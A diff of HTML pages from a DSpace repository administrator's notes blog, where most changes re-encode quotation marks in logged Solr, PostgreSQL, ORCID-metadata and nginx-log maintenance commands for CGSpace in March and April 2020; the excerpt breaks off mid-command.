<li>I should definitely add HttpClient to the bot user agents&hellip;</li>
<li>Also, while <code>bot</code>, <code>spider</code>, and <code>crawl</code> are in the pattern list already and can be used for case-insensitive matching when used by DSpace in Java, I can&rsquo;t do case-insensitive matching in Solr with <code>check-spider-hits.sh</code>
@ -1171,7 +1171,7 @@ Total number of bot hits purged: 159
</li>
<li>I tried to migrate the 2019 Solr statistics again on CGSpace because the automatic sharding failed last month:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34;
$ schedtool -D -e ionice -c2 -n7 dspace stats-util -s &gt;&gt; log/cron-stats-util.log.$(date --iso-8601)
</code></pre><ul>
<li>Interestingly I saw this in the Solr log:</li>
@ -1186,7 +1186,7 @@ $ schedtool -D -e ionice -c2 -n7 dspace stats-util -s &gt;&gt; log/cron-stats-ut
</li>
<li>Manually create a core in the DSpace 6.4-SNAPSHOT instance on my local environment:</li>
</ul>
<pre tabindex="0"><code>$ curl 'http://localhost:8080/solr/admin/cores?action=CREATE&amp;name=statistics-2019&amp;instanceDir=/home/aorth/dspace63/solr/statistics&amp;dataDir=/home/aorth/dspace63/solr/statistics-2019/data'
<pre tabindex="0"><code>$ curl &#39;http://localhost:8080/solr/admin/cores?action=CREATE&amp;name=statistics-2019&amp;instanceDir=/home/aorth/dspace63/solr/statistics&amp;dataDir=/home/aorth/dspace63/solr/statistics-2019/data&#39;
</code></pre><ul>
<li>After that the <code>statistics-2019</code> core was immediately available in the Solr UI, but after restarting Tomcat it was gone
<ul>
@ -1195,7 +1195,7 @@ $ schedtool -D -e ionice -c2 -n7 dspace stats-util -s &gt;&gt; log/cron-stats-ut
</li>
<li>First export a small slice of 2019 stats from the main CGSpace <code>statistics</code> core, skipping Atmire schema additions:</li>
</ul>
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2019-01-16.json -f 'time:2019-01-16*' -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2019-01-16.json -f &#39;time:2019-01-16*&#39; -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId
</code></pre><ul>
<li>Then import into my local <code>statistics</code> core:</li>
</ul>
@ -1226,8 +1226,8 @@ Moving: 21993 into core statistics-2019
</ul>
</li>
</ul>
<pre tabindex="0"><code>&lt;meta content=&quot;Thu hoạch v&amp;agrave; bảo quản c&amp;agrave; ph&amp;ecirc; ch&amp;egrave; đ&amp;uacute;ng kỹ thuật (Harvesting and storing Arabica coffee)&quot; name=&quot;citation_title&quot;&gt;
&lt;meta name=&quot;citation_title&quot; content=&quot;Thu hoạch và bảo quản cà phê chè đúng kỹ thuật (Harvesting and storing Arabica coffee)&quot; /&gt;
<pre tabindex="0"><code>&lt;meta content=&#34;Thu hoạch v&amp;agrave; bảo quản c&amp;agrave; ph&amp;ecirc; ch&amp;egrave; đ&amp;uacute;ng kỹ thuật (Harvesting and storing Arabica coffee)&#34; name=&#34;citation_title&#34;&gt;
&lt;meta name=&#34;citation_title&#34; content=&#34;Thu hoạch và bảo quản cà phê chè đúng kỹ thuật (Harvesting and storing Arabica coffee)&#34; /&gt;
</code></pre><ul>
<li><a href="https://jira.lyrasis.org/browse/DS-4397">DS-4397 controlled vocabulary loading speedup</a></li>
</ul>

View File

@ -42,7 +42,7 @@ You need to download this into the DSpace 6.x source and compile it
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -141,7 +141,7 @@ You need to download this into the DSpace 6.x source and compile it
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;
$ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
</code></pre><h2 id="2020-03-03">2020-03-03</h2>
<ul>
@ -160,7 +160,7 @@ $ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-03-04-fix-1-ilri-subject.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.ilri -m 203 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-03-04-fix-1-ilri-subject.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.subject.ilri -m 203 -t correct -d
</code></pre><ul>
<li>But I have not run it on CGSpace yet because we want to ask Peter if he is sure about it&hellip;</li>
<li>Send a message to Macaroni Bros to ask them about their Drupal module and its readiness for DSpace 6 UUIDs</li>
@ -179,16 +179,16 @@ $ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
</ul>
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics-2010 -a export -o /tmp/statistics-2010.json -k uid
$ ./run.sh -s http://localhost:8081/solr/statistics -a import -o /tmp/statistics-2010.json -k uid
$ curl -s &quot;http://localhost:8081/solr/statistics-2010/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary &quot;&lt;delete&gt;&lt;query&gt;time:2010*&lt;/query&gt;&lt;/delete&gt;&quot;
$ curl -s &#34;http://localhost:8081/solr/statistics-2010/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;time:2010*&lt;/query&gt;&lt;/delete&gt;&#34;
$ ./run.sh -s http://localhost:8081/solr/statistics-2011 -a export -o /tmp/statistics-2011.json -k uid
$ ./run.sh -s http://localhost:8081/solr/statistics -a import -o /tmp/statistics-2011.json -k uid
$ curl -s &quot;http://localhost:8081/solr/statistics-2011/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary &quot;&lt;delete&gt;&lt;query&gt;time:2011*&lt;/query&gt;&lt;/delete&gt;&quot;
$ curl -s &#34;http://localhost:8081/solr/statistics-2011/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;time:2011*&lt;/query&gt;&lt;/delete&gt;&#34;
$ ./run.sh -s http://localhost:8081/solr/statistics -a import -o /tmp/statistics-2012.json -k uid
$ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2012*&amp;rows=0&amp;wt=json&amp;indent=true' | grep numFound
&quot;response&quot;:{&quot;numFound&quot;:3761989,&quot;start&quot;:0,&quot;docs&quot;:[]
$ curl -s 'http://localhost:8081/solr/statistics-2012/select?q=time:2012*&amp;rows=0&amp;wt=json&amp;indent=true' | grep numFound
&quot;response&quot;:{&quot;numFound&quot;:3761989,&quot;start&quot;:0,&quot;docs&quot;:[]
$ curl -s &quot;http://localhost:8081/solr/statistics-2012/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary &quot;&lt;delete&gt;&lt;query&gt;time:2012*&lt;/query&gt;&lt;/delete&gt;&quot;
$ curl -s &#39;http://localhost:8081/solr/statistics/select?q=time:2012*&amp;rows=0&amp;wt=json&amp;indent=true&#39; | grep numFound
&#34;response&#34;:{&#34;numFound&#34;:3761989,&#34;start&#34;:0,&#34;docs&#34;:[]
$ curl -s &#39;http://localhost:8081/solr/statistics-2012/select?q=time:2012*&amp;rows=0&amp;wt=json&amp;indent=true&#39; | grep numFound
&#34;response&#34;:{&#34;numFound&#34;:3761989,&#34;start&#34;:0,&#34;docs&#34;:[]
$ curl -s &#34;http://localhost:8081/solr/statistics-2012/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;time:2012*&lt;/query&gt;&lt;/delete&gt;&#34;
</code></pre><ul>
<li>I will do this for as many cores as I can (disk space limited) and then monitor the effect on the system and JVM memory usage
<ul>
@ -196,7 +196,7 @@ $ curl -s &quot;http://localhost:8081/solr/statistics-2012/update?softCommit=tru
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics-2014 -a export -o /tmp/statistics-2014-1.json -k uid -f 'time:/2014-0[1-6].*/'
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics-2014 -a export -o /tmp/statistics-2014-1.json -k uid -f &#39;time:/2014-0[1-6].*/&#39;
</code></pre><ul>
<li>Upgrade PostgreSQL from 9.6 to 10 on DSpace Test (linode19)
<ul>
@ -213,7 +213,7 @@ $ curl -s &quot;http://localhost:8081/solr/statistics-2012/update?softCommit=tru
# pg_dropcluster 10 main
# pg_upgradecluster 9.6 main
# pg_dropcluster 9.6 main
# dpkg -l | grep postgresql | grep 9.6 | awk '{print $2}' | xargs dpkg -r
# dpkg -l | grep postgresql | grep 9.6 | awk &#39;{print $2}&#39; | xargs dpkg -r
</code></pre><h2 id="2020-03-09">2020-03-09</h2>
<ul>
<li>Peter noticed that the Solr stats were not showing anything before 2020
@ -250,7 +250,7 @@ $ curl -s &quot;http://localhost:8081/solr/statistics-2012/update?softCommit=tru
<li>In Solr the IP is 127.0.0.1, but in the nginx logs I can luckily see the real IP (64.225.40.66), which is on Digital Ocean</li>
<li>I will purge them from Solr statistics:</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;userAgent:&quot;Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 (.NET CLR 3.5.30729)&quot;&lt;/query&gt;&lt;/delete&gt;'
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;userAgent:&#34;Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 (.NET CLR 3.5.30729)&#34;&lt;/query&gt;&lt;/delete&gt;&#39;
</code></pre><ul>
<li>Another user agent that seems to be a bot is:</li>
</ul>
@ -258,14 +258,14 @@ $ curl -s &quot;http://localhost:8081/solr/statistics-2012/update?softCommit=tru
</code></pre><ul>
<li>In Solr the IP is 127.0.0.1 because of the misconfiguration, but in nginx&rsquo;s logs I see it belongs to three IPs on Online.net in France:</li>
</ul>
<pre tabindex="0"><code># zcat /var/log/nginx/access.log.*.gz /var/log/nginx/rest.log.*.gz | grep 'Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)' | awk '{print $1}' | sort | uniq -c
<pre tabindex="0"><code># zcat /var/log/nginx/access.log.*.gz /var/log/nginx/rest.log.*.gz | grep &#39;Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)&#39; | awk &#39;{print $1}&#39; | sort | uniq -c
63090 163.172.68.99
183428 163.172.70.248
147608 163.172.71.24
</code></pre><ul>
<li>It is making 10,000 to 40,000 requests to XMLUI per day&hellip;</li>
</ul>
<pre tabindex="0"><code># zgrep -c 'Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)' /var/log/nginx/access.log.{1..9}
<pre tabindex="0"><code># zgrep -c &#39;Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)&#39; /var/log/nginx/access.log.{1..9}
/var/log/nginx/access.log.30.gz:18687
/var/log/nginx/access.log.31.gz:28936
/var/log/nginx/access.log.32.gz:36402
@ -284,7 +284,7 @@ $ curl -s &quot;http://localhost:8081/solr/statistics-2012/update?softCommit=tru
</code></pre><ul>
<li>I will purge those hits too!</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;userAgent:&quot;Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)&quot;&lt;/query&gt;&lt;/delete&gt;'
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;userAgent:&#34;Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)&#34;&lt;/query&gt;&lt;/delete&gt;&#39;
</code></pre><ul>
<li>Shit, and something happened and a few thousand hits from user agents with &ldquo;Bot&rdquo; in their user agent got through
<ul>
@ -348,7 +348,7 @@ Purging 62 hits from [Ss]pider in statistics
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2020-03-12-affiliations.csv WITH CSV HEADER;`
dspace=# \q
$ csvcut -l -c 0 /tmp/2020-03-12-affiliations.csv | sed -e 's/^line_number/id/' -e 's/text_value/name/' &gt; /tmp/affiliations.csv
$ csvcut -l -c 0 /tmp/2020-03-12-affiliations.csv | sed -e &#39;s/^line_number/id/&#39; -e &#39;s/text_value/name/&#39; &gt; /tmp/affiliations.csv
$ lein run /tmp/affiliations.csv name id
</code></pre><ul>
<li>I always forget how to copy the reconciled values in OpenRefine, but you need to make a new column and populate it using this GREL: <code>if(cell.recon.matched, cell.recon.match.name, value)</code></li>
@ -417,7 +417,7 @@ $ lein run /tmp/affiliations.csv name id
<li>Update Tomcat to version 7.0.103 in the Ansible infrastrcutrue playbooks and deploy on DSpace Test (linode26)</li>
<li>Maria sent me a few new ORCID identifiers from Bioversity so I combined them with our existing ones, filtered the unique ones, and then resolved their names using my <code>resolve-orcids.py</code> script:</li>
</ul>
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcids | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; /tmp/2020-03-26-combined-orcids.txt
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcids | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2020-03-26-combined-orcids.txt
$ ./resolve-orcids.py -i /tmp/2020-03-26-combined-orcids.txt -o /tmp/2020-03-26-combined-names.txt -d
# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
@ -425,16 +425,16 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<li>I checked the database for likely matches to the author name and then created a CSV with the author names and ORCID iDs:</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;King, Brian&quot;,&quot;Brian King: 0000-0002-7056-9214&quot;
&quot;Ortiz-Crespo, Berta&quot;,&quot;Berta Ortiz-Crespo: 0000-0002-6664-0815&quot;
&quot;Ekesa, Beatrice&quot;,&quot;Beatrice Ekesa: 0000-0002-2630-258X&quot;
&quot;Ekesa, B.&quot;,&quot;Beatrice Ekesa: 0000-0002-2630-258X&quot;
&quot;Ekesa, B.N.&quot;,&quot;Beatrice Ekesa: 0000-0002-2630-258X&quot;
&quot;Gullotta, G.&quot;,&quot;Gaia Gullotta: 0000-0002-2240-3869&quot;
&#34;King, Brian&#34;,&#34;Brian King: 0000-0002-7056-9214&#34;
&#34;Ortiz-Crespo, Berta&#34;,&#34;Berta Ortiz-Crespo: 0000-0002-6664-0815&#34;
&#34;Ekesa, Beatrice&#34;,&#34;Beatrice Ekesa: 0000-0002-2630-258X&#34;
&#34;Ekesa, B.&#34;,&#34;Beatrice Ekesa: 0000-0002-2630-258X&#34;
&#34;Ekesa, B.N.&#34;,&#34;Beatrice Ekesa: 0000-0002-2630-258X&#34;
&#34;Gullotta, G.&#34;,&#34;Gaia Gullotta: 0000-0002-2240-3869&#34;
</code></pre><ul>
<li>Running the <code>add-orcid-identifiers-csv.py</code> script I added 32 ORCID iDs to items on CGSpace!</li>
</ul>
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i /tmp/2020-03-26-ciat-orcids.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i /tmp/2020-03-26-ciat-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Udana from IWMI asked about some items that are missing Altmetric donuts on CGSpace
<ul>
@ -447,13 +447,13 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
</ul>
<h2 id="2020-03-29">2020-03-29</h2>
<ul>
<li>Add two more Bioversity ORCID iDs to CGSpace and then tag ~70 of the authors' existing publications in the database using this CSV with my <code>add-orcid-identifiers-csv.py</code> script:</li>
<li>Add two more Bioversity ORCID iDs to CGSpace and then tag ~70 of the authors&rsquo; existing publications in the database using this CSV with my <code>add-orcid-identifiers-csv.py</code> script:</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;Snook, L.K.&quot;,&quot;Laura Snook: 0000-0002-9168-1301&quot;
&quot;Snook, L.&quot;,&quot;Laura Snook: 0000-0002-9168-1301&quot;
&quot;Zheng, S.J.&quot;,&quot;Sijun Zheng: 0000-0003-1550-3738&quot;
&quot;Zheng, S.&quot;,&quot;Sijun Zheng: 0000-0003-1550-3738&quot;
&#34;Snook, L.K.&#34;,&#34;Laura Snook: 0000-0002-9168-1301&#34;
&#34;Snook, L.&#34;,&#34;Laura Snook: 0000-0002-9168-1301&#34;
&#34;Zheng, S.J.&#34;,&#34;Sijun Zheng: 0000-0003-1550-3738&#34;
&#34;Zheng, S.&#34;,&#34;Sijun Zheng: 0000-0003-1550-3738&#34;
</code></pre><ul>
<li>Deploy latest Bioversity and CIAT updates on CGSpace (linode18) and DSpace Test (linode26)</li>
<li>Deploy latest Ansible infrastructure playbooks on CGSpace and DSpace Test to get the latest dspace-statistics-api (v1.1.1) and Tomcat (7.0.103) versions</li>

View File

@ -48,7 +48,7 @@ The third item now has a donut with score 1 since I tweeted it last week
On the same note, the one item Abenet pointed out last week now has a donut with score of 104 after I tweeted it last week
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -171,14 +171,14 @@ On the same note, the one item Abenet pointed out last week now has a donut with
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ psql -h localhost -U postgres dspace -c &quot;DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240 AND text_value LIKE '%Ballantyne%';&quot;
<pre tabindex="0"><code>$ psql -h localhost -U postgres dspace -c &#34;DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240 AND text_value LIKE &#39;%Ballantyne%&#39;;&#34;
DELETE 97
$ ./add-orcid-identifiers-csv.py -i 2020-04-07-peter-orcids.csv -db dspace -u dspace -p 'fuuu' -d
$ ./add-orcid-identifiers-csv.py -i 2020-04-07-peter-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -d
</code></pre><ul>
<li>I used this CSV with the script (all records with his name have the name standardized like this):</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;Ballantyne, Peter G.&quot;,&quot;Peter G. Ballantyne: 0000-0001-9346-2893&quot;
&#34;Ballantyne, Peter G.&#34;,&#34;Peter G. Ballantyne: 0000-0001-9346-2893&#34;
</code></pre><ul>
<li>Then I tried another way, to identify all duplicate ORCID identifiers for a given resource ID and group them so I can see if count is greater than 1:</li>
</ul>
@ -188,31 +188,31 @@ COPY 15209
<li>Of those, about nine authors had duplicate ORCID identifiers over about thirty records, so I created a CSV with all their name variations and ORCID identifiers:</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;Ballantyne, Peter G.&quot;,&quot;Peter G. Ballantyne: 0000-0001-9346-2893&quot;
&quot;Ramirez-Villegas, Julian&quot;,&quot;Julian Ramirez-Villegas: 0000-0002-8044-583X&quot;
&quot;Villegas-Ramirez, J&quot;,&quot;Julian Ramirez-Villegas: 0000-0002-8044-583X&quot;
&quot;Ishitani, Manabu&quot;,&quot;Manabu Ishitani: 0000-0002-6950-4018&quot;
&quot;Manabu, Ishitani&quot;,&quot;Manabu Ishitani: 0000-0002-6950-4018&quot;
&quot;Ishitani, M.&quot;,&quot;Manabu Ishitani: 0000-0002-6950-4018&quot;
&quot;Ishitani, M.&quot;,&quot;Manabu Ishitani: 0000-0002-6950-4018&quot;
&quot;Buruchara, Robin A.&quot;,&quot;Robin Buruchara: 0000-0003-0934-1218&quot;
&quot;Buruchara, Robin&quot;,&quot;Robin Buruchara: 0000-0003-0934-1218&quot;
&quot;Jarvis, Andy&quot;,&quot;Andy Jarvis: 0000-0001-6543-0798&quot;
&quot;Jarvis, Andrew&quot;,&quot;Andy Jarvis: 0000-0001-6543-0798&quot;
&quot;Jarvis, A.&quot;,&quot;Andy Jarvis: 0000-0001-6543-0798&quot;
&quot;Tohme, Joseph M.&quot;,&quot;Joe Tohme: 0000-0003-2765-7101&quot;
&quot;Hansen, James&quot;,&quot;James Hansen: 0000-0002-8599-7895&quot;
&quot;Hansen, James W.&quot;,&quot;James Hansen: 0000-0002-8599-7895&quot;
&quot;Asseng, Senthold&quot;,&quot;Senthold Asseng: 0000-0002-7583-3811&quot;
&#34;Ballantyne, Peter G.&#34;,&#34;Peter G. Ballantyne: 0000-0001-9346-2893&#34;
&#34;Ramirez-Villegas, Julian&#34;,&#34;Julian Ramirez-Villegas: 0000-0002-8044-583X&#34;
&#34;Villegas-Ramirez, J&#34;,&#34;Julian Ramirez-Villegas: 0000-0002-8044-583X&#34;
&#34;Ishitani, Manabu&#34;,&#34;Manabu Ishitani: 0000-0002-6950-4018&#34;
&#34;Manabu, Ishitani&#34;,&#34;Manabu Ishitani: 0000-0002-6950-4018&#34;
&#34;Ishitani, M.&#34;,&#34;Manabu Ishitani: 0000-0002-6950-4018&#34;
&#34;Ishitani, M.&#34;,&#34;Manabu Ishitani: 0000-0002-6950-4018&#34;
&#34;Buruchara, Robin A.&#34;,&#34;Robin Buruchara: 0000-0003-0934-1218&#34;
&#34;Buruchara, Robin&#34;,&#34;Robin Buruchara: 0000-0003-0934-1218&#34;
&#34;Jarvis, Andy&#34;,&#34;Andy Jarvis: 0000-0001-6543-0798&#34;
&#34;Jarvis, Andrew&#34;,&#34;Andy Jarvis: 0000-0001-6543-0798&#34;
&#34;Jarvis, A.&#34;,&#34;Andy Jarvis: 0000-0001-6543-0798&#34;
&#34;Tohme, Joseph M.&#34;,&#34;Joe Tohme: 0000-0003-2765-7101&#34;
&#34;Hansen, James&#34;,&#34;James Hansen: 0000-0002-8599-7895&#34;
&#34;Hansen, James W.&#34;,&#34;James Hansen: 0000-0002-8599-7895&#34;
&#34;Asseng, Senthold&#34;,&#34;Senthold Asseng: 0000-0002-7583-3811&#34;
</code></pre><ul>
<li>Then I deleted <em>all</em> their existing ORCID identifier records:</li>
</ul>
<pre tabindex="0"><code>dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240 AND text_value SIMILAR TO '%(0000-0001-6543-0798|0000-0001-9346-2893|0000-0002-6950-4018|0000-0002-7583-3811|0000-0002-8044-583X|0000-0002-8599-7895|0000-0003-0934-1218|0000-0003-2765-7101)%';
<pre tabindex="0"><code>dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240 AND text_value SIMILAR TO &#39;%(0000-0001-6543-0798|0000-0001-9346-2893|0000-0002-6950-4018|0000-0002-7583-3811|0000-0002-8044-583X|0000-0002-8599-7895|0000-0003-0934-1218|0000-0003-2765-7101)%&#39;;
DELETE 994
</code></pre><ul>
<li>And then I added them again using the <code>add-orcid-identifiers</code> records:</li>
</ul>
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2020-04-07-fix-duplicate-orcids.csv -db dspace -u dspace -p 'fuuu' -d
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2020-04-07-fix-duplicate-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -d
</code></pre><ul>
<li>I ran the fixes on DSpace Test and CGSpace as well</li>
<li>I started testing the <a href="https://github.com/ilri/DSpace/pull/445">pull request</a> sent by Atmire yesterday
@ -230,7 +230,7 @@ DELETE 994
</ul>
</li>
</ul>
<pre tabindex="0"><code>dspace63=# DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');
<pre tabindex="0"><code>dspace63=# DELETE FROM schema_version WHERE version IN (&#39;5.8.2015.12.03.3&#39;);
dspace63=# CREATE EXTENSION pgcrypto;
</code></pre><ul>
<li>Then DSpace 6.3 started up OK and I was able to see some statistics in the Content and Usage Analysis (CUA) module, but not on community, collection, or item pages
@ -243,7 +243,7 @@ dspace63=# CREATE EXTENSION pgcrypto;
</code></pre><ul>
<li>And I remembered I actually need to run the DSpace 6.4 Solr UUID migrations:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;
$ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
</code></pre><ul>
<li>Run system updates on DSpace Test (linode26) and reboot it</li>
@ -258,7 +258,7 @@ $ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
<li>I realized that <code>solr-upgrade-statistics-6x</code> only processes 100,000 records by default so I think we actually need to finish running it for all legacy Solr records before asking Atmire why CUA statlets and detailed statistics aren&rsquo;t working</li>
<li>For now I am just doing 250,000 records at a time on my local environment:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Xmx2000m -Dfile.encoding=UTF-8&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Xmx2000m -Dfile.encoding=UTF-8&#34;
$ ~/dspace63/bin/dspace solr-upgrade-statistics-6x -n 250000
</code></pre><ul>
<li>Despite running the migration for all of my local 1.5 million Solr records, I still see a few hundred thousand like <code>-1</code> and <code>0-unmigrated</code>
@ -284,7 +284,7 @@ $ podman start artifactory
<ul>
<li>A few days ago Peter asked me to update an author&rsquo;s name on CGSpace and in the controlled vocabularies:</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value='Knight-Jones, Theodore J.D.' WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value='Knight-Jones, T.J.D.';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=&#39;Knight-Jones, Theodore J.D.&#39; WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value=&#39;Knight-Jones, T.J.D.&#39;;
</code></pre><ul>
<li>I updated his existing records on CGSpace, changed the controlled lists, added his ORCID identifier to the controlled list, and tagged his thirty-nine items with the ORCID iD</li>
<li>The new DSpace 6 stuff that Atmire sent modifies the Mirage 2&rsquo;s <code>pom.xml</code> to copy the each theme&rsquo;s resulting <code>node_modules</code> to each theme after building and installing with <code>ant update</code> because they moved some packages from bower to npm and now reference them in <code>page-structure.xsl</code>
@ -315,7 +315,7 @@ $ podman start artifactory
<ul>
<li>Looking into a high rate of outgoing bandwidth from yesterday on CGSpace (linode18):</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;19/Apr/2020:0[6789]&quot; | goaccess --log-format=COMBINED -
<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;19/Apr/2020:0[6789]&#34; | goaccess --log-format=COMBINED -
</code></pre><ul>
<li>One host in Russia (91.241.19.70) download 23GiB over those few hours in the morning
<ul>
@ -325,7 +325,7 @@ $ podman start artifactory
</ul>
<pre tabindex="0"><code># grep -c 91.241.19.70 /var/log/nginx/access.log.1
8900
# grep 91.241.19.70 /var/log/nginx/access.log.1 | grep -c '10568/35187'
